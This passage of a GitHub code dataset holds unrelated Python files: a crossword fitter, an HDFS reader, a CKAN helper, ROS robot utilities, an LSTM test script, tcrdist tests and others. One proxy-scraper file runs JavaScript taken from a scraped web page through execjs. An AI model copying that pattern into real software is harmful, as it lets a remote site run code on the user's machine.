range(0,len(grid[0])-len(word)+1):\n for j in range(0,len(grid)):\n testvalid = 
True\n for k in range(0,len(word)):\n if grid[j][i+k] != '0' and grid[j][i+k] != word[k]:\n testvalid = False\n break\n for k in range(maxoverlap,len(word)-maxoverlap-1):\n if j > 0:\n if grid[j-1][i+k] != '0' and grid[j-1][i+k+1] != '0':\n testvalid = False\n break\n if symmetry:\n if grid[-j][-i-k-1] != '0' and grid[-j][-i-k-2] != '0':\n testvalid = False\n break\n\n if j<len(grid)-1:\n if grid[j+1][i+k] != '0' and grid[j+1][i+k+1] != '0':\n testvalid = False\n break\n if symmetry:\n if grid[-j-2][-i-k-1] != '0' and grid[-j-2][-i-k-2] != '0':\n testvalid = False\n break\n if i>0:\n if grid[j][i-1] not in ['0',' ']:\n testvalid = False\n if symmetry:\n if grid[-j-1][-i] not in ['0',' ']:\n testvalid = False\n if i+len(word)<len(grid[0]):\n if grid[j][i+len(word)] not in ['0',' ']:\n testvalid = False\n if symmetry:\n if grid[-j-1][-i-len(word)-1] not in ['0',' ']:\n testvalid = False\n \n if symmetry and j*2+1==len(grid) and 2*len(word)>=len(grid[0]) and len(word) != len(grid[0]):\n testvalid = False\n \n if testvalid == True:\n valids.append([i,j,'Across'])\n\n for i in range(0,len(grid[0])):\n for j in range(0,len(grid)-len(word)+1):\n testvalid = True\n for k in range(0,len(word)):\n if grid[j+k][i] != '0' and grid[j+k][i] != word[k]:\n testvalid = False\n break\n for k in range(maxoverlap,len(word)-maxoverlap-1):\n if i > 0:\n if grid[j+k][i-1] != '0' and grid[j+k+1][i-1] != '0': \n testvalid = False\n break\n if symmetry:\n if grid[-j-k-1][-i] != '0' and grid[-j-k-2][-i] != '0': \n testvalid = False\n break\n\n if i<len(grid[0])-1:\n if grid[j+k][i+1] != '0' and grid[j+k+1][i+1] != '0':\n testvalid=False\n break\n if symmetry:\n if grid[-j-k-1][-i-2] != '0' and grid[-j-k-2][-i-2] != '0':\n testvalid=False\n break\n\n if j>0: \n if grid[j-1][i] not in ['0',' ']:\n testvalid = False\n if symmetry:\n if grid[-j][-i-1] not in ['0',' ']:\n testvalid = False\n\n if j+len(word)<len(grid): \n if grid[j+len(word)][i] not in ['0',' ']:\n testvalid = False\n if symmetry:\n if grid[-j-len(word)-1][-i-1] not in ['0',' ']:\n testvalid = False\n\n if symmetry and i*2+1==len(grid[0]) and 2*len(word)>=len(grid) and len(word)!=len(grid):\n testvalid = False\n\n if testvalid == True:\n valids.append([i,j,'Down'])\n return valids\n\ndef putin(word,grid,i,j,angle):\n if angle == 'Across':\n for k in range(0,len(word)):\n grid[j][i+k]=word[k]\n if i > 0:\n grid[j][i-1]=' '\n if symmetry == True:\n grid[-j-1][-i]=' '\n if i+len(word)<len(grid[0]):\n grid[j][i+len(word)]=' '\n if symmetry == True:\n grid[-j-1][-i-len(word)-1]=' '\n if angle == 'Down':\n for k in range(0,len(word)):\n grid[j+k][i]=word[k]\n if j > 0:\n grid[j-1][i]=' '\n if symmetry == True:\n grid[-j][-i-1]=' '\n if j+len(word)<len(grid):\n grid[j+len(word)][i]=' '\n if symmetry == True:\n grid[-j-len(word)-1][-i-1]=' '\n\n\n\ndef fill(grid,words,score):\n global bestscore\n #print(words) \n if len(words)!=0:\n valids=findvalids(words[0],grid)\n for valid in valids:\n ngrid=copy.deepcopy(grid)\n nscore=score\n putin(words[0],ngrid,*valid)\n nscore+=1\n #cprint(ngrid)\n if nscore>=bestscore:\n bestscore=nscore\n cprint(ngrid)\n print(bestscore)\n nwords=list(words)\n nwords.pop(0)\n fill(ngrid,nwords,nscore)\n words.pop(0)\n fill(grid,words,score)\n else:\n return\n \n\nif __name__==\"__main__\":\n score=0\n bestscore=0\n 
fill(grid,_list,score)","repo_name":"JamesEdgeley/CrosswordFitterPython","sub_path":"fitter.py","file_name":"fitter.py","file_ext":"py","file_size_in_byte":5512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"21387753439","text":"# Read an integer N, then compute the sum and the product\n# of the integers from 1 to N.\n# #include <stdio.h>\n# void main()\n# {\n# int i, N, S, P;\n# printf(“Nhap N = “); scanf(“%d”, &N);\n# S = 0; P = 1;\n# for(i = 1; i <= N; i++)\n# {\n# S += i;\n# P *= i;\n# }\n# printf(“S = %d\\n”, S);\n# printf(“P = %d\\n”, P);\n# }\n\ndef main():\n    N = int(input(\"Nhap N = \"))\n    S = 0 ; P = 1\n    for i in range(1, N+1): # from 1 to N\n        S += i\n        P *= i\n    print(f'S = {S}')\n    print(f'P = {P}')\n\nmain()","repo_name":"tiendat01/source-subject-hust","sub_path":"Python-learn-IT3150-ProjectI/ly-thuyet-TinDC-byPython/chuong4/page29.py","file_name":"page29.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"vi","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"27487425367","text":"#!/usr/bin/env python3\n# _*_ coding: utf-8 _*_\n\n\"\"\"\n    Read file contents from HDFS\n    @see:https://pypi.org/project/PyHDFS/\n\"\"\"\n\n__author__ = 'JKong'\n\nimport pandas as pd\nfrom pyhdfs import HdfsClient\n\nclient = HdfsClient(hosts='10.10.27.47:9870', user_name=\"hdfs\")\n# TypeError: cannot use a string pattern on a bytes-like object\n# Read the file from HDFS\nfile = client.open(r\"/a_jkong_test_data/1000.txt\")\n# Fetch the contents\ncontent = file.read()\n# After open, file is binary; str() converts it to a string and decodes it\ns = str(content, \"utf-8\")\n# Open the local .csv file and write the contents\nfile = open(\"./data/data.csv\", \"w\")\nfile.write(s)\n# Read the local csv file with pandas\ntrain_data = pd.read_csv(\"./data/data.csv\", sep=\",\", header=None, usecols=[0, 1, 2, 3, 4],\n                         names=['id', 'name', 'age', 'gender', 'time'])\nprint(train_data)\n","repo_name":"chaihuo-go/deutero-learning-samples","sub_path":"python/python_learning/pandas/datasource/2_hdfs_source.py","file_name":"2_hdfs_source.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
+{"seq_id":"423391765","text":"import sys\ninput = sys.stdin.readline\n\n\nN = int(input()) \narr = [list(input().strip()) for _ in range(N)]\n\nalphabet = []\nfor word in arr:\n    for a in word:\n        if a not in alphabet:\n            alphabet.append(a)\n\nvalue_list = []\nfor a in alphabet:\n    value = 0\n    for word in arr:\n        if a not in word: # skip words that do not contain this letter\n            continue\n\n        s = \"\"\n        for w in word:\n            s += \"1\" if w == a else \"0\"\n        value += int(s)\n\n    value_list.append(value)\n\nvalue_list.sort(reverse=True) \n\nanswer = 0\nvalue = 9\nfor s in value_list:\n    answer += value * s\n    value -= 1\n\nprint(answer)","repo_name":"kimhyeongjun95/AlgoPullgo","sub_path":"009주차/단어 수학/beom.py","file_name":"beom.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"}
+{"seq_id":"42334100271","text":"import ckan.plugins.toolkit as tk\n\n\nconfig = tk.config\n\n\ndef is_s3filestore_enabled():\n    enabled = config.get('hdx.s3filestore')\n    if enabled is None:\n        enabled = 's3filestore' in config.get('ckan.plugins', '')\n        config['hdx.s3filestore'] = enabled\n    return enabled\n","repo_name":"OCHA-DAP/hdx-ckan","sub_path":"ckanext-hdx_theme/ckanext/hdx_theme/helpers/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"72"}
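The hdx-ckan record directly above ends with is_s3filestore_enabled, a compute-once-then-cache idiom for a configuration flag: read the explicit setting first, fall back to deriving the value from the plugin list, and write the derived value back into config so later calls are cheap. A minimal runnable sketch of the same idiom, assuming a plain dict as a stand-in for CKAN's real tk.config object (the dict contents below are illustrative, not taken from the record):

    # Stand-in for CKAN's config mapping; key names mirror the record above.
    config = {"ckan.plugins": "stats s3filestore datastore"}

    def is_s3filestore_enabled():
        enabled = config.get("hdx.s3filestore")
        if enabled is None:
            # Derive the flag from the plugin list once, then cache it back.
            enabled = "s3filestore" in config.get("ckan.plugins", "")
            config["hdx.s3filestore"] = enabled
        return enabled

    print(is_s3filestore_enabled())  # True; subsequent calls hit the cached key

The write-back is the point of the pattern: deriving the flag costs a substring scan on every call, while the cached key turns every later check into a single dict lookup.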
+{"seq_id":"8879492846","text":"import re\nimport execjs\nfrom spoon_server.proxy.provider import Provider\nfrom spoon_server.util.html_parser import get_html_tree\n\n\nclass PdbProvider(Provider):\n def __init__(self, url_list=None):\n super(Provider, self).__init__()\n if not url_list:\n self.url_list = self._gen_url_list()\n\n @staticmethod\n def _gen_url_list():\n url_list = ['http://proxydb.net/?protocol=http&protocol=https',\n ]\n return url_list\n\n @Provider.provider_exception\n def getter(self):\n for url in self.url_list:\n tree = get_html_tree(url)\n if tree is None:\n continue\n proxy_list = tree.xpath('/html/body/div[2]/table//tr')\n for px in proxy_list[1:]:\n script_string = 'function func() {var proxies=[];' + (\n re.sub(\"document.*?;\", \"\",\n ''.join(px.xpath('./td[1]/script/text()'))) + \"; return proxies}\").replace(\n \"\\n\", \"\")\n js_string = execjs.compile(script_string)\n result = js_string.call('func')\n yield result[0]\n\n\nif __name__ == \"__main__\":\n kd = PdbProvider()\n for proxy in kd.getter():\n print(proxy)\n","repo_name":"Jiramew/spoon","sub_path":"spoon_server/proxy/pdb_provider.py","file_name":"pdb_provider.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"72"} +{"seq_id":"34631182956","text":"a, b, c = map(int, input().split())\r\n\r\ns = set()\r\nfind_flag = 0\r\n\r\nfor i in range(1, 100):\r\n rest = a * i % b\r\n if rest == c:\r\n find_flag = 1\r\n break\r\n if rest in s:\r\n break\r\n else:\r\n s.add(rest)\r\n\r\nif find_flag:\r\n print(\"YES\")\r\nelse:\r\n print(\"NO\")","repo_name":"YamasouA/Atcoder","sub_path":"ABC60-B.py","file_name":"ABC60-B.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"471575047","text":"from Solver.Option_Solver import Option_Solver\n\nif __name__==\"__main__\":\n ### Option-Inputparamter:\n r, q, sigma, K, T, option_type = 0.1, 0.05, 0.25, 100, 2, 'Put'\n\n ### Further parameters:\n l=99 # number of basis points for the Gauss quadrature\n m=25 # number of basis points for the Chebyshev polynomial\n n=15 # number of fixpoint iteration steps\n stop_by_diff=1e-6 # set stop_by_diff=None for fixed n\n\n\n ### Creating instance:\n option = Option_Solver(r, q, sigma, K, T, option_type)\n\n ### calculate Early Exercise Boundary:\n option.create_boundary()\n\n ### calculate prices:\n S, tau = 100, 1 # tau has to be in [0, T]\n American_price = option.American_price(S, tau) \n American_premium = option.premium(S, tau)\n European_price = option.European_price(S, tau)\n\n ### Output:\n print('American_price:', American_price)\n print('American_premium:', American_premium)\n print('European_price:', European_price)\n \n\n\n\n\n","repo_name":"MariusLotz/Masterarbeit2023","sub_path":"Option_pricer.py","file_name":"Option_pricer.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18707690205","text":"# this is multi tags abc class method,selcet m form N,m<N,m>1,N>2\n#from my_model.task.task_class.abc_class import ABCClass \n\n#from my_model.layers.base_process import InputFeatures\nfrom my_model.task.abc_task import ABCTask\nimport json\ndef get_mul_tags(tags_path,max_seq_length=512,embeddings_type='other',args=None):\n data_dir=None\n vocab_path=None\n tokenizer=None\n fe = 
ABCMulTags(data_dir,'./',tags_path,vocab_path,embeddings_type=embeddings_type,tokenizer=tokenizer,max_seq_length=max_seq_length,args=args)\n return fe.get_label_ids\nclass ABCMulTags(ABCTask):\n @staticmethod\n def parse_word_label(line): \n res_json = json.loads(line)\n word = res_json['statement_split']\n word = word.strip(':')\n label = res_json['law_item']\n return word,label\n def _read_data(self,input_file):\n \"\"\"Read a BIO data!\"\"\"\n rf = open(input_file,'r')\n lines = []\n #words = []\n #labels = []\n for line in rf:\n #word = line.strip().split(' ')[0]\n #label = line.strip().split(' ')[-1]\n\n word,label = self.parse_word_label(line)\n # here we dont do \"DOCSTART\" check\n #checkfor la in label:\n #check if la:\n #check if word:\n #check #words.append(word)\n #check #labels.append(la)\n if not label:\n raise ValueError('label is empty,and word is {}'.format(word))\n yield (label,word)\n # lines.append((label,word))\n #rf.close()\n #return lines\n def get_label_ids(self,label):\n label_ids = [0] * len(self.label_list)\n for la in label:\n idx = self.label_map.get(la,0)\n if idx != 0:\n label_ids[idx] = 1\n \n return label_ids\n #def _convert_single_example(self,ex_index, example, mode):\n\n # input_ids,mask,segment_ids,ntokens = self._convert_single_feature(ex_index,example,mode)\n # label_ids = self._convert_single_feature(ex_index,example,mode)\n # feature = InputFeatures(\n # input_ids=input_ids,\n # mask=mask,\n # segment_ids=segment_ids,\n # label_ids=label_ids,\n # )\n # # we need ntokens because if we do predict it can help us return to original token.\n # return feature,label_ids,ntokens\n","repo_name":"ycpan/my_model","sub_path":"src/my_model/task/task_class/abc_mul_tags.py","file_name":"abc_mul_tags.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7543628181","text":"import time\nimport sys\nimport numpy as np\nimport rospy\nfrom math import sqrt, cos, sin\nfrom geometry_msgs.msg import Twist\n\n\nclass kuka():\n #\"A class for connecting to and sending commands to a kuka\"\n\n def __init__(self):\n rospy.init_node('Kuka_emergency_stop', anonymous=True)\n self.cmd_pub = rospy.Publisher('/cmd_vel',Twist,queue_size=10)\n\n def stop(self):\n\n newcmd = Twist()\n newcmd.linear.x = 0\n newcmd.linear.y = 0\n newcmd.linear.z = 0\n\n newcmd.angular.x = 0\n newcmd.angular.y = 0\n newcmd.angular.z = 0\n\n self.cmd_pub.publish(newcmd)\n\nif __name__ == '__main__':\n kuka1 = kuka()\n while not rospy.is_shutdown():\n kuka1.stop()\n # rospy.spin()\n","repo_name":"akchoi/KUKA-skills","sub_path":"estop.py","file_name":"estop.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37307194959","text":"import torch\nfrom torch.utils.data import DataLoader\nimport sys\nimport torch.nn as nn\nsys.path.append(\"..\")\n\n# from model.tvts_bert import TVTSBERT\n# from finetune_predict import TVTSBERTFTPredictor\nfrom LSTM_prediction_model import LSTM\nfrom LSTM_predict import LSTMPredictor\nfrom finetune.finetune_predict_dataset import FinetunePredictDataset\nimport numpy as np\nimport pandas as pd\nimport random\nfrom matplotlib import pyplot as plt\n\n\ndef test2_plot(prediction_result_list, input289_list, prediction_len, seq_len=288):\n p = []\n q = []\n inputs = []\n for item in prediction_result_list:\n\n p.append(item.cpu().numpy())\n for item in input289_list:\n 
q.append(item.cpu().numpy())\n\n\n    # predicted values\n    prediction_result = np.array(p[:-1]).flatten() # drop the last sample, whose length may differ; len:4608\n    print(prediction_result.shape)\n\n    input289 = np.array(q[:-1]).flatten()\n\n    for i in range(len(input289)):\n        if i % (seq_len+prediction_len) == 0:\n            inputs.append(input289[i:i+prediction_len])\n    # ground-truth input values\n    inputs_array = np.array(inputs).flatten() # len:4608\n    print(inputs_array.shape)\n\n\n    plt.figure()\n    # input curve, 3*288, blue\n    # plt.plot(inputs_array[seq_len:seq_len*2], c='b', label='Input1')\n    # plt.plot(np.arange(seq_len,seq_len*2), inputs_array[seq_len*2:seq_len*3], c='b', label='Origin2', linestyle='--')\n    # plt.plot(np.arange(seq_len*2,seq_len*3), inputs_array[seq_len*3:seq_len*4], c='b', label='Origin3')\n    plt.plot(inputs_array[seq_len:seq_len*8], c='r', label='Input')\n\n    # prediction curve, 3*288, red\n    # plt.plot(prediction_result[:seq_len], c='r', label='Predict1')\n    # plt.plot(np.arange(seq_len, seq_len*2), prediction_result[seq_len:seq_len*2], c='r', label='Predict2', linestyle='--')\n    # plt.plot(np.arange(seq_len*2,seq_len*3), prediction_result[seq_len*2:seq_len*3], c='r', label='Predict3')\n    plt.plot(prediction_result[:seq_len*7], c='g', label='Predict')\n\n    plt.vlines(287.5, 0, 70, colors='black', linestyles='--')\n    plt.vlines(575.5, 0, 70, colors='black', linestyles='--')\n    plt.vlines(863.5, 0, 70, colors='black', linestyles='--')\n    plt.vlines(1151.5, 0, 70, colors='black', linestyles='--')\n    plt.vlines(1439.5, 0, 70, colors='black', linestyles='--')\n    plt.vlines(1727.5, 0, 70, colors='black', linestyles='--')\n    plt.hlines(0, 0, 2015, colors='black', linestyles='--')\n    plt.title('A Week Prediction Result')\n    plt.legend(['Input', 'Predict'])\n    # plt.savefig('420finetune_predict_1.png')\n    plt.savefig('2_12.png')\n\n    df = pd.DataFrame({'Input': inputs_array[seq_len:seq_len * 8],\n                       'Predict': prediction_result[:seq_len * 7],\n                       })\n    df.to_csv('2_12.csv')\n\n\ndef save_results(prediction_result_list, input289_list, word_len, prediction_len, dropout, seq_len=288):\n    # print(f'prediction result list shape: [{len(prediction_result_list)}, {len(prediction_result_list[0])}, {len(prediction_result_list[0][0])}]')\n    # print(f'input list shape: [{len(input289_list)}, {len(input289_list[0])}, {len(input289_list[0][0])}]')\n    # [20, batchsize, prediction len]\n    # [20, batchsize, 288 + prediction len]\n    p = []\n    q = []\n    inputs = []\n    for item in prediction_result_list:\n        p.append(item.cpu().numpy())\n    for item in input289_list:\n        q.append(item.cpu().numpy())\n\n    p_array = np.array(p[:-1]) # [num of sample in dataloader-1, batchsize, prediction_len]\n    q_array = np.array(q[:-1]) # [num of sample in dataloader-1, batchsize, 288 + prediction_len]\n    # predicted values\n    prediction_result = p_array.flatten()\n    input289 = q_array[:,:,-prediction_len:].flatten()\n    print(prediction_result.shape)\n    print(input289.shape)\n\n    df_all = pd.DataFrame({'Input': input289,\n                           'Predict': prediction_result,\n                           })\n    print(df_all.head(10))\n    # df.to_csv('420predict_result_1.csv')\n    # print(f'Saving predict test result into /{word_len}_{prediction_len}_{dropout}_new.xlsx ...')\n    print(f'Saving predict test result into test_result_all/prediction_result_new/excel/lstm_{prediction_len}_{dropout}_step36.csv ...')\n    df_all.to_csv(f'../finetune/test_result_all/prediction_result_new/lstm_{prediction_len}_{dropout}_step36.csv')\n    df_all.to_excel(f'../finetune/test_result_all/prediction_result_new/excel/lstm_{prediction_len}_{dropout}_step36.xlsx', index=False)\n    # df_all.to_excel(f'test_result_all/prediction_result_new/excel/{word_len}_{prediction_len}_{dropout}_new.xlsx', index=False)\n\n\ndef setup_seed(seed):\n    torch.manual_seed(seed)\n    torch.cuda.manual_seed_all(seed)\n    np.random.seed(seed)\n    random.seed(seed)\n    torch.backends.cudnn.deterministic = True\n\nsetup_seed(20)\n\nfile_path = '../data/'\nseq_len = 288\npe_window = 288\nnum_features = 1\nepochs = 30\nbatch_size = 64\nhidden_size = 64\nlayers = 3\nattn_heads = 8\nlearning_rate = 2e-5\n\nword_len = 1\n# prediction_len = 12\ndropout = 0.1\n\nfor prediction_len in [1]:\n    print(f'prediction length: {prediction_len}')\n    # pretrain_path = f'../checkpoints/pretrain/word-{word_len}-{dropout}/'\n    # finetune_path = f'../checkpoints/finetune/prediction/word-{word_len}-p-{prediction_len}-dropout{dropout}-new/'\n    finetune_path = f'../checkpoints/finetune/prediction/lstm-p{prediction_len}-dropout{dropout}-step36/'\n\n    train_file = file_path + 'train%dsmoothed.csv' % (seq_len+prediction_len)\n    valid_file = file_path + 'valid%dsmoothed.csv' % (seq_len+prediction_len)\n    test_file = file_path + 'test%dsmoothed.csv' % (seq_len+prediction_len)\n    # train_file = file_path + f'train_step36_pre{prediction_len}_smoothed.csv'\n    # valid_file = file_path + f'valid_step36_pre{prediction_len}_smoothed.csv'\n    # test_file = file_path + f'test_step36_pre{prediction_len}_smoothed.csv'\n\n    train_dataset = FinetunePredictDataset(file_path=train_file,\n                                           num_features=num_features,\n                                           seq_len=seq_len,\n                                           prediction_len=prediction_len,\n                                           word_len=word_len)\n    valid_dataset = FinetunePredictDataset(file_path=valid_file,\n                                           num_features=num_features,\n                                           seq_len=seq_len,\n                                           prediction_len=prediction_len,\n                                           word_len=word_len)\n    test_dataset = FinetunePredictDataset(file_path=test_file,\n                                          num_features=num_features,\n                                          seq_len=seq_len,\n                                          prediction_len=prediction_len,\n                                          word_len=word_len)\n\n    train_dataloader = DataLoader(train_dataset, shuffle=True, num_workers=8, pin_memory=True,\n                                  batch_size=batch_size, drop_last=False)\n    valid_dataloader = DataLoader(valid_dataset, shuffle=False, num_workers=8, pin_memory=True,\n                                  batch_size=batch_size, drop_last=False)\n    test_dataloader = DataLoader(test_dataset, shuffle=False, num_workers=8, pin_memory=True,\n                                 batch_size=batch_size, drop_last=False)\n\n    # tvtsbert = TVTSBERT(word_len=word_len,\n    #                     hidden=hidden_size,\n    #                     n_layers=layers,\n    #                     pe_window=pe_window,\n    #                     attn_heads=attn_heads,\n    #                     dropout=dropout)\n    lstm = LSTM(input_size=num_features,\n                hidden_size=hidden_size,\n                num_layers=layers,\n                prediction_len=prediction_len,\n                )\n\n    # tvtsbert_path = pretrain_path + \"checkpoint.bert.pth\"\n    # tvtsbert.load_state_dict(torch.load(tvtsbert_path, map_location=torch.device('cpu')))\n\n    # tvtsbert.load_state_dict(torch.load(tvtsbert_path))\n\n\n    # finetuner = TVTSBERTFTPredictor(tvtsbert, num_features=num_features,\n    #                                 seq_len=seq_len, prediction_len=prediction_len,\n    #                                 word_len=word_len, train_dataloader=train_dataloader,\n    #                                 valid_dataloader=valid_dataloader)\n    finetuner = LSTMPredictor(lstm, seq_len=seq_len, prediction_len=prediction_len,\n                              hidden=hidden_size, num_features=num_features, layers=layers, lr=learning_rate,\n                              train_dataloader=train_dataloader, valid_dataloader=valid_dataloader)\n\n    # Test: reload the finetuned model\n    print(\"\\n\" * 5)\n    print(\"Testing TVTS-BERT Finetune Predictor...\")\n\n\n    finetuner.load(finetune_path)\n\n    # test requires input argument i: which epoch (< 31)\n    # argument j: which sample (< 32)\n\n    # prediction_result_list, prediction_target_list = finetuner.test(test_dataloader)\n    prediction_result_list, input289_list 
= finetuner.test(test_dataloader)\n\n\n # test2_plot(prediction_result_list, input289_list, prediction_len=prediction_len)\n save_results(prediction_result_list, input289_list,\n word_len=word_len, prediction_len=prediction_len, dropout=dropout)\n print('----------\\n')\n\n","repo_name":"Xiao-Di/TSSN","sub_path":"LSTM/predict_test.py","file_name":"predict_test.py","file_ext":"py","file_size_in_byte":9190,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71433155753","text":"import pytest\nimport pandas as pd\nv20df = pd.read_csv('https://www.dropbox.com/s/wmc5wc752t782kq/MIRA_v21_covid_diagnosed_sars_cov2_ci_epitope_specific_tcrs.tsv?dl=1', sep = \"\\t\").head(1000)\nv21df = pd.read_csv('https://www.dropbox.com/s/c3gfq1lu0xdefpy/MIRA_v20_covid_diagnosed_sars_cov2_ci_epitope_specific_tcrs.tsv?dl=1', sep = \"\\t\").head(1000)\n\n\"\"\"\nExample 1, Edit Dist 1 join\n\"\"\"\ndef test_tcr_join_edit1():\n import pandas as pd\n from tcrdist.join import join_by_dist\n from tcrdist.breadth import get_safe_chunk\n from tcrdist.rep_funcs import compute_pws_sparse\n import pwseqdist as pw\n\n my_metrics = { \"cdr3_b_aa\" : pw.metrics.nb_vector_editdistance}\n my_weights = { \"cdr3_b_aa\" : 1}\n my_kargs = {\"cdr3_b_aa\" :{'use_numba': True}}\n distances = compute_pws_sparse(\n df= v21df,\n df2 = v20df ,\n metrics = my_metrics,\n weights = my_weights,\n kargs = my_kargs,\n radius=1,\n cpu=2, \n chunk_size=get_safe_chunk(v21df.shape[0], v20df.shape[0]), \n store=False, \n pm_pbar=True)\n csrmat = distances['tcrdist'] # it's called a tcrdist here, but was computed as edit distance 1\n left_join_df = join_by_dist(\n how = 'left',\n csrmat = csrmat,\n left_df = v21df,\n right_df = v20df,\n left_cols = ['cdr3_b_aa','v_b_gene','j_b_gene','protein_coordinate','bio_identity','subject'],\n right_cols = ['cdr3_b_aa','v_b_gene','j_b_gene','protein_coordinate','bio_identity','subject'],\n left_suffix = '_x',\n right_suffix = '_y',\n max_n= 10,\n radius = 1)\n inner_join_df = join_by_dist(\n how = 'inner',\n csrmat = csrmat,\n left_df = v21df,\n right_df = v20df,\n left_cols = ['cdr3_b_aa','v_b_gene','j_b_gene','protein_coordinate','bio_identity','subject'],\n right_cols = ['cdr3_b_aa','v_b_gene','j_b_gene','protein_coordinate','bio_identity','subject'],\n left_suffix = '_x',\n right_suffix = '_y',\n max_n= 10,\n radius = 1)\n outer_join_df = join_by_dist(\n how = 'outer',\n csrmat = csrmat,\n left_df = v21df,\n right_df = v20df,\n left_cols = ['cdr3_b_aa','v_b_gene','j_b_gene','protein_coordinate','bio_identity','subject'],\n right_cols = ['cdr3_b_aa','v_b_gene','j_b_gene','protein_coordinate','bio_identity','subject'],\n left_suffix = '_x',\n right_suffix = '_y',\n max_n= 10,\n radius = 1)\n \n assert left_join_df.shape[0] > inner_join_df.shape[0]\n assert outer_join_df.shape[0] > inner_join_df.shape[0]\n assert outer_join_df.shape[0] > left_join_df.shape[0]\n \n\"\"\"\n2. 
Full Example using TCRdist on all CDRs on real data from two MIRA cohorts, \nHere we use TCRrep to infer CDR1,2,2.5 to compute a full tcrdist \n\"\"\"\ndef test_tcr_join_tcrdist():\n import pandas as pd\n from tcrdist.breadth import get_safe_chunk\n from tcrdist.repertoire import TCRrep\n from tcrdist.join import join_by_dist\n\n tr20 = TCRrep(cell_df = v20df[['subject', 'cdr3_b_aa', 'v_b_gene', 'j_b_gene', 'bio_identity','protein_coordinate']].copy(),\n organism='human', \n chains=['beta'], \n compute_distances = False)\n tr21 = TCRrep(cell_df = v21df[['subject', 'cdr3_b_aa', 'v_b_gene', 'j_b_gene', 'bio_identity', 'protein_coordinate']].copy(),\n organism='human', \n chains=['beta'], \n compute_distances = False)\n tr21.cpus = 2\n tr21.compute_sparse_rect_distances(df = tr21.clone_df, df2 = tr20.clone_df, radius = 36, chunk_size = get_safe_chunk(tr21.clone_df.shape[0], tr20.clone_df.shape[0]))\n\n left_right_comparision = join_by_dist(\n how = 'inner',\n csrmat = tr21.rw_beta,\n left_df = v21df,\n right_df = v20df,\n left_cols = ['cdr3_b_aa','v_b_gene','j_b_gene','protein_coordinate','bio_identity','subject'],\n right_cols = ['cdr3_b_aa','v_b_gene','j_b_gene','protein_coordinate','bio_identity','subject'],\n left_suffix = '_x',\n right_suffix = '_y',\n max_n= 10,\n radius = 24)\n\n","repo_name":"kmayerb/tcrdist3","sub_path":"tcrdist/tests/test_join.py","file_name":"test_join.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"72"} +{"seq_id":"15531566861","text":"import geometry_msgs.msg\nimport visualization_msgs.msg\nimport rospy\nimport tf\n\nimport tf2_ros\nimport tf2_msgs.msg\nimport geometry_msgs.msg\n\n\nclass SceneObject:\n\n # name = ''\n # parent_object = None\n # parent_object_name = None\n # transform_from_parent_object = geometry_msgs.msg.TransformStamped()\n # object_id = None\n #\n # has_visual = False\n # mesh_resource = 'package://nextage_movement_skills/python/meshes/tmp/whole_sweep.dae'\n\n def __init__(self):\n self.parent_object = None\n self.parent_object_name = None\n self.transform_from_parent_object = geometry_msgs.msg.TransformStamped()\n self.object_id = None\n self.marker_type = visualization_msgs.msg.Marker.MESH_RESOURCE\n self.mesh_resource = None\n self.name = None\n self.has_visual = False\n self.has_collision = False\n self.updated = True\n self.children = {}\n self.delete_marker = False\n self.type = 'abstract_object'\n self.color = {'r': 1.0, 'g': 0.0, 'b': 0.0}\n self.size = [1.0, 1.0, 1.0]\n\n def set_name(self, name):\n self.name = name\n\n def add_child(self, child):\n self.children[child.name] = child\n\n def remove_child_by_name(self, child_name):\n if child_name in self.children.keys():\n del self.children[child_name]\n return\n rospy.logwarn(\"Object child not deleted from \" + self.name + \": not in dict\")\n\n def set_object_id(self, idx):\n self.object_id = idx\n\n def set_transform_from_parent_object(self, transform):\n self.transform_from_parent_object = transform\n\n def set_parent_object(self, parent_object):\n self.parent_object = parent_object\n\n def set_parent_object_name(self, parent_object_name):\n self.parent_object_name = parent_object_name\n\n def set_mesh_resource(self, mesh_resource):\n self.mesh_resource = mesh_resource\n self.has_visual = True\n self.marker_type = visualization_msgs.msg.Marker.MESH_RESOURCE\n\n def set_visualization(self, viz_type=visualization_msgs.msg.Marker.SPHERE):\n self.marker_type = viz_type\n self.has_visual = 
True\n\n def set_size(self, size=[0.1, 0.1, 0.1]):\n self.size = size\n\n def set_has_collision(self, has_collision=True):\n self.has_collision = has_collision\n return self.has_collision\n\n def get_has_collision(self):\n return self.has_collision\n\n def get_visualization_marker(self, action=visualization_msgs.msg.Marker.ADD):\n # type: (int) -> visualization_msgs.Marker\n if not self.has_visual:\n rospy.logwarn(\"Object \" + self.name + \" shall not be visualized. Configure and retry!\")\n return\n marker = visualization_msgs.msg.Marker()\n\n # marker.header.frame_id = self.parent_object_name\n marker.header.frame_id = self.name\n marker.header.stamp = rospy.Time.now()\n marker.ns = \"scene_objects\"\n marker.id = self.object_id\n marker.type = self.marker_type\n marker.action = action\n\n if self.delete_marker:\n marker.action = visualization_msgs.msg.Marker.DELETE\n\n marker.pose.position.x = 0\n marker.pose.position.y = 0\n marker.pose.position.z = 0\n marker.pose.orientation.x = 0\n marker.pose.orientation.y = 0\n marker.pose.orientation.z = 0\n 